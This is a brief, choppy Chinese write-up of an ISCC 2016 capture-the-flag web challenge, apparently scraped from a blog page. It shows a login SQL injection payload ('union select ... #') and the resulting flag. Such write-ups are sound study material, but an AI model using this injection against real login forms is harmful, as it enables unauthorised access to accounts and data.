ISCC 2016 WEB WP

web 150php 打开页面,发现能够直接看源码html 那就打开源码,看到这里mysql 发现注入web 那咱们构造一下user和pass就行了正则表达式 user=flag&pass=' union select user from user where user='flag'# sql Flag: 5a2f5d8f-58fa-481b-a19f-9aab97ba6a4b session w
相关文章
相关标签/搜索